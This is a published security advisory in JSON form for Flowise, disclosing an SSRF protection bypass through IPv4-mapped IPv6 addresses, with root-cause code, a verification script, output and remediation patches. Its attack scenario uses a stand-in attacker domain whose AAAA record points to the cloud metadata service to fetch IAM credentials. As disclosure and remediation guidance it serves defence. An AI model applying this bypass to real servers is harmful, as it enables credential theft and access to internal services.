{"id":"GHSA-c6xh-wv4j-ppv5","summary":"Flowise: SSRF Protection Bypass via IPv4-Mapped IPv6 Addresses","details":"## Summary\n\nFlowise's HTTP security module (`httpSecurity.ts`) fails to normalize IPv4-mapped IPv6 addresses (e.g., `::ffff:127.0.0.1`, `::ffff:169.254.169.254`) before checking them against the deny list. Due to an `ipaddr.js` kind mismatch (`ipv6` vs `ipv4`), all IPv4 CIDR deny rules are silently skipped for IPv4-mapped IPv6 addresses. An attacker who controls DNS resolution for a hostname can set a AAAA record to `::ffff:\u003ctarget_ipv4\u003e`, completely bypassing all SSRF protections and accessing internal services, cloud metadata endpoints, and localhost.\n\n## CWE\n\n- **CWE-918**: Server-Side Request Forgery (SSRF)\n- **CWE-1389**: Incorrect Parsing of Numbers with Different Radices (IPv4-mapped IPv6 not normalized to IPv4 before deny list check)\n\n## Affected Versions\n\n- All versions up to and including **v3.1.1** (latest main branch as of 2026-04-03)\n- This includes versions where CVE-2026-31829 was supposedly patched (v3.0.13+)\n\n## Details\n\n### Root Cause\n\nThe `isDeniedIP()` function in `packages/components/src/httpSecurity.ts` checks IP addresses against a deny list using `ipaddr.js`. The critical flaw is in the `kind()` comparison:\n\n```typescript\n// httpSecurity.ts - isDeniedIP()\nexport function isDeniedIP(ip: string, denyList: string[]): void {\n    const parsedIp = ipaddr.parse(ip);\n    for (const entry of denyList) {\n        if (entry.includes('/')) {\n            try {\n                const [range, _] = entry.split('/')\n                const parsedRange = ipaddr.parse(range)\n                // ⚠️ BUG: IPv4-mapped IPv6 has kind='ipv6', IPv4 CIDR has kind='ipv4'\n                // This condition is FALSE for ::ffff:x.x.x.x vs any IPv4 CIDR entry\n                if (parsedIp.kind() === parsedRange.kind()) {  // \u003c-- BYPASS HERE\n                    if (parsedIp.match(ipaddr.parseCIDR(entry))) {\n                        throw new Error('Access to this host is denied by policy.')\n                    }\n                }\n            } catch (error) {\n                throw new Error(`isDeniedIP: ${error}`)\n            }\n        } else if (ip === entry) {\n            throw new Error('Access to this host is denied by policy.')\n        }\n    }\n}\n```\n\nWhen the resolved IP is an IPv4-mapped IPv6 address like `::ffff:169.254.169.254`:\n- `ipaddr.parse('::ffff:169.254.169.254').kind()` returns `'ipv6'`\n- `ipaddr.parse('169.254.169.254').kind()` (from deny list entry) returns `'ipv4'`\n- `'ipv6' === 'ipv4'` is `false` → **CIDR check is completely skipped**\n\nThe IPv6 deny list entries (`::1`, `fc00::/7`, `fe80::/10`, `ff00::/8`) do NOT cover the `::ffff:0:0/96` range where IPv4-mapped addresses live, so these addresses bypass ALL deny rules.\n\n### Attack Vector\n\n1. Attacker registers a domain (e.g., `evil.attacker.com`) and sets a **AAAA DNS record** to `::ffff:169.254.169.254` (AWS metadata) or `::ffff:10.0.0.1` (internal service)\n2. Attacker configures a chatflow HTTP Node (or API Chain, Document Loader, etc.) to make a request to `http://evil.attacker.com/latest/meta-data/`\n3. `resolveAndValidate()` calls `dns.lookup('evil.attacker.com', { all: true })` which returns `[{ address: '::ffff:169.254.169.254', family: 6 }]`\n4. `isDeniedIP('::ffff:169.254.169.254', denyList)` is called — all IPv4 CIDR entries are skipped due to kind mismatch\n5. Request is sent to `169.254.169.254` (AWS metadata service) via the IPv4-mapped IPv6 address\n\n### Affected Endpoints\n\nAll code paths using the SSRF protection functions are vulnerable:\n\n| Function | Usage Count | Affected Components |\n|----------|:-----------:|-------------------|\n| `secureAxiosRequest()` | 8+ | HTTP Node (Agentflow), ExecuteFlow, APILoader, FireCrawl, Spider, AzureRerank |\n| `secureFetch()` | 5+ | ApiChain, Custom Function sandbox, Jira tool, MCP tool |\n| `checkDenyList()` | 3+ | MCP Server URL validation, fetch-links service, web scraping |\n\n### Proof of Concept\n\n```javascript\n// Verify the bypass using ipaddr.js (same library Flowise uses)\nconst ipaddr = require('ipaddr.js');\n\nconst denyList = [\n    '169.254.169.254/16',  // Cloud metadata (covered by 169.254.0.0/16 in Flowise)\n    '10.0.0.0/8',          // RFC1918 (covered by 10.0.0.0/8 in Flowise)\n    '127.0.0.0/8',         // Loopback (covered by 127.0.0.0/8 in Flowise)\n    '172.16.0.0/12',       // RFC1918 (covered by 172.16.0.0/12 in Flowise)\n    '192.168.0.0/16',      // RFC1918 (covered by 192.168.0.0/16 in Flowise)\n];\n\n// Normal IPv4 - correctly blocked\nconst normalIP = ipaddr.parse('169.254.169.254');\nconsole.log('169.254.169.254 kind:', normalIP.kind()); // 'ipv4'\n\n// IPv4-mapped IPv6 - bypasses ALL checks\nconst mappedIP = ipaddr.parse('::ffff:169.254.169.254');\nconsole.log('::ffff:169.254.169.254 kind:', mappedIP.kind()); // 'ipv6'\nconsole.log('Is IPv4Mapped?:', mappedIP.isIPv4MappedAddress()); // true\nconsole.log('Maps to:', mappedIP.toIPv4Address().toString()); // '169.254.169.254'\n\n// Demonstrate the bypass\nfor (const entry of denyList) {\n    const [range] = entry.split('/');\n    const parsedRange = ipaddr.parse(range);\n    const kindMatch = mappedIP.kind() === parsedRange.kind();\n    console.log(`${entry}: kind match = ${kindMatch}`); // ALL false!\n}\n// Result: ALL deny list entries are skipped\n```\n\n**Attack Scenario (AWS Cloud):**\n```bash\n# 1. Attacker sets up DNS: evil.com AAAA -\u003e ::ffff:a9fe:a9fe (169.254.169.254)\n# 2. Attacker creates a chatflow with HTTP Node pointing to:\n#    URL: http://evil.com/latest/meta-data/iam/security-credentials/\n# 3. Flowise resolves evil.com -\u003e ::ffff:169.254.169.254\n# 4. isDeniedIP skips all IPv4 CIDR checks (kind mismatch)\n# 5. Request reaches AWS IMDS -\u003e Returns IAM role credentials\n```\n\n### Verified PoC Output\n\nThe following output was produced by running the PoC script (`poc_ssrf_bypass.js`) against `ipaddr.js@2.2.0` (the exact version used by Flowise `^2.2.0`), replicating the `isDeniedIP()` logic:\n\n**Step 1: kind() mismatch confirmed**\n```\n169.254.169.254                kind=ipv4  isIPv4Mapped=false\n::ffff:169.254.169.254         kind=ipv6  isIPv4Mapped=true  → maps to: 169.254.169.254\n127.0.0.1                      kind=ipv4  isIPv4Mapped=false\n::ffff:127.0.0.1               kind=ipv6  isIPv4Mapped=true  → maps to: 127.0.0.1\n10.0.0.1                       kind=ipv4  isIPv4Mapped=false\n::ffff:10.0.0.1                kind=ipv6  isIPv4Mapped=true  → maps to: 10.0.0.1\n192.168.1.1                    kind=ipv4  isIPv4Mapped=false\n::ffff:192.168.1.1             kind=ipv6  isIPv4Mapped=true  → maps to: 192.168.1.1\n172.16.0.1                     kind=ipv4  isIPv4Mapped=false\n::ffff:172.16.0.1              kind=ipv6  isIPv4Mapped=true  → maps to: 172.16.0.1\n```\n\n**Step 2: Normal IPv4 — correctly blocked ✅**\n```\n169.254.169.254           → 🔒 BLOCKED (matched: 169.254.169.254)\n127.0.0.1                 → 🔒 BLOCKED (matched: 127.0.0.0/8)\n10.0.0.1                  → 🔒 BLOCKED (matched: 10.0.0.0/8)\n192.168.1.1               → 🔒 BLOCKED (matched: 192.168.0.0/16)\n172.16.0.1                → 🔒 BLOCKED (matched: 172.16.0.0/12)\n```\n\n**Step 3: IPv4-Mapped IPv6 — ALL bypass deny list ⚠️**\n```\n::ffff:169.254.169.254         → ⚠️ ALLOWED (BYPASS!)  (real target: 169.254.169.254)\n::ffff:127.0.0.1               → ⚠️ ALLOWED (BYPASS!)  (real target: 127.0.0.1)\n::ffff:10.0.0.1                → ⚠️ ALLOWED (BYPASS!)  (real target: 10.0.0.1)\n::ffff:192.168.1.1             → ⚠️ ALLOWED (BYPASS!)  (real target: 192.168.1.1)\n::ffff:172.16.0.1              → ⚠️ ALLOWED (BYPASS!)  (real target: 172.16.0.1)\n```\n\n**Step 4: Root cause — kind mismatch skips CIDR check**\n```\nChecking: ::ffff:169.254.169.254 against deny entry 169.254.0.0/16\nparsedIp.kind()    = 'ipv6'\nparsedRange.kind() = 'ipv4'\nkind match?        = false ← CIDR check is SKIPPED!\nBut the IP actually maps to: 169.254.169.254 (which IS in 169.254.0.0/16)\n```\n\n**Step 5: Proposed fix — all bypass addresses now blocked ✅**\n```\n::ffff:169.254.169.254         → 🔒 BLOCKED (FIXED!) (matched: 169.254.0.0/16)\n::ffff:127.0.0.1               → 🔒 BLOCKED (FIXED!) (matched: 127.0.0.0/8)\n::ffff:10.0.0.1                → 🔒 BLOCKED (FIXED!) (matched: 10.0.0.0/8)\n::ffff:192.168.1.1             → 🔒 BLOCKED (FIXED!) (matched: 192.168.0.0/16)\n::ffff:172.16.0.1              → 🔒 BLOCKED (FIXED!) (matched: 172.16.0.0/12)\n```\n\n**Step 6: Attack simulation**\n```\nVulnerable isDeniedIP:  ⚠️ ALLOWED → Request reaches AWS metadata!\nFixed isDeniedIP:       🔒 BLOCKED → Attack prevented!\n```\n\n\u003e **Verification environment**: Node.js v22.13.1, ipaddr.js@2.2.0 (matches Flowise dependency `^2.2.0`)\n\u003e **PoC script**: [poc_ssrf_bypass.js](https://github.com/user-attachments/files/26456899/poc_ssrf_bypass.js)\n\n\n## Impact\n\n| Target | Impact | Severity |\n|--------|--------|----------|\n| AWS/GCP/Azure Metadata (`169.254.169.254`) | Steal IAM credentials, service account tokens | Critical |\n| Internal services (`10.x.x.x`, `172.16.x.x`, `192.168.x.x`) | Access internal APIs, databases, admin panels | High |\n| Localhost (`127.0.0.1`) | Access Flowise's own API with elevated privileges, access co-located services | High |\n\nThis bypass renders the SSRF protection added in v3.0.13 (CVE-2026-31829 fix) **completely ineffective** against IPv4-mapped IPv6 DNS resolution.\n\n## Remediation\n\n### Option 1: Normalize IPv4-Mapped IPv6 Before Checking (Recommended)\n\n```typescript\nexport function isDeniedIP(ip: string, denyList: string[]): void {\n    let parsedIp = ipaddr.parse(ip);\n    \n    // ✅ FIX: Normalize IPv4-mapped IPv6 to IPv4 before checking\n    if (parsedIp.kind() === 'ipv6' && parsedIp.isIPv4MappedAddress()) {\n        parsedIp = parsedIp.toIPv4Address();\n    }\n    \n    for (const entry of denyList) {\n        if (entry.includes('/')) {\n            try {\n                const [range, _] = entry.split('/');\n                let parsedRange = ipaddr.parse(range);\n                // Also normalize deny list entries\n                if (parsedRange.kind() === 'ipv6' && parsedRange.isIPv4MappedAddress()) {\n                    parsedRange = parsedRange.toIPv4Address();\n                }\n                if (parsedIp.kind() === parsedRange.kind()) {\n                    if (parsedIp.match(ipaddr.parseCIDR(entry))) {\n                        throw new Error('Access to this host is denied by policy.');\n                    }\n                }\n            } catch (error) {\n                throw new Error(`isDeniedIP: ${error}`);\n            }\n        } else if (ip === entry) {\n            throw new Error('Access to this host is denied by policy.');\n        }\n    }\n}\n```\n\n### Option 2: Add `::ffff:0:0/96` to Deny List (Defense-in-depth)\n\nAdditionally, add the IPv4-mapped IPv6 prefix to the deny list to block ALL mapped addresses:\n\n```typescript\nconst DEFAULT_DENY_LIST = [\n    // ... existing entries ...\n    '::ffff:0:0/96',        // Block ALL IPv4-mapped IPv6 addresses\n    '::ffff:127.0.0.1/128', // Explicit loopback mapped\n    '::ffff:169.254.0.0/112', // Explicit link-local mapped  \n    '::ffff:10.0.0.0/104',  // Explicit RFC1918 Class A mapped\n    '::ffff:172.16.0.0/108', // Explicit RFC1918 Class B mapped\n    '::ffff:192.168.0.0/112', // Explicit RFC1918 Class C mapped\n];\n```\n\n### Option 3: Also normalize in `resolveAndValidate()` (Belt and suspenders)\n\n```typescript\nasync function resolveAndValidate(url: string): Promise\u003cResolvedTarget\u003e {\n    // ... existing code ...\n    const records = await dns.lookup(hostname, { all: true });\n    for (const r of records) {\n        let address = r.address;\n        // Normalize IPv4-mapped IPv6 for deny list checking\n        if (ipaddr.isValid(address)) {\n            const parsed = ipaddr.parse(address);\n            if (parsed.kind() === 'ipv6' && parsed.isIPv4MappedAddress()) {\n                address = parsed.toIPv4Address().toString();\n            }\n        }\n        isDeniedIP(address, denyList);\n    }\n    // ... rest of code ...\n}\n```","aliases":["CVE-2026-69257"],"modified":"2026-08-19T05:15:06.613385570Z","published":"2026-08-04T15:51:58Z","database_specific":{"cwe_ids":["CWE-1389","CWE-918"],"severity":"HIGH","github_reviewed":true,"github_reviewed_at":"2026-08-04T15:51:58Z","nvd_published_at":null},"references":[{"type":"WEB","url":"https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-c6xh-wv4j-ppv5"},{"type":"WEB","url":"https://github.com/FlowiseAI/Flowise/pull/6431"},{"type":"WEB","url":"https://github.com/FlowiseAI/Flowise/commit/0fc769208395641c1411ccdb9c81416e54802155"},{"type":"PACKAGE","url":"https://github.com/FlowiseAI/Flowise"},{"type":"WEB","url":"https://github.com/FlowiseAI/Flowise/releases/tag/flowise@3.1.3"}],"affected":[{"package":{"name":"flowise","ecosystem":"npm","purl":"pkg:npm/flowise"},"ranges":[{"type":"SEMVER","events":[{"introduced":"0"},{"fixed":"3.1.3"}]}],"database_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/08/GHSA-c6xh-wv4j-ppv5/GHSA-c6xh-wv4j-ppv5.json","last_known_affected_version_range":"\u003c= 3.1.2"}}],"schema_version":"1.9.0","severity":[{"type":"CVSS_V4","score":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:L/SC:N/SI:N/SA:N"}]}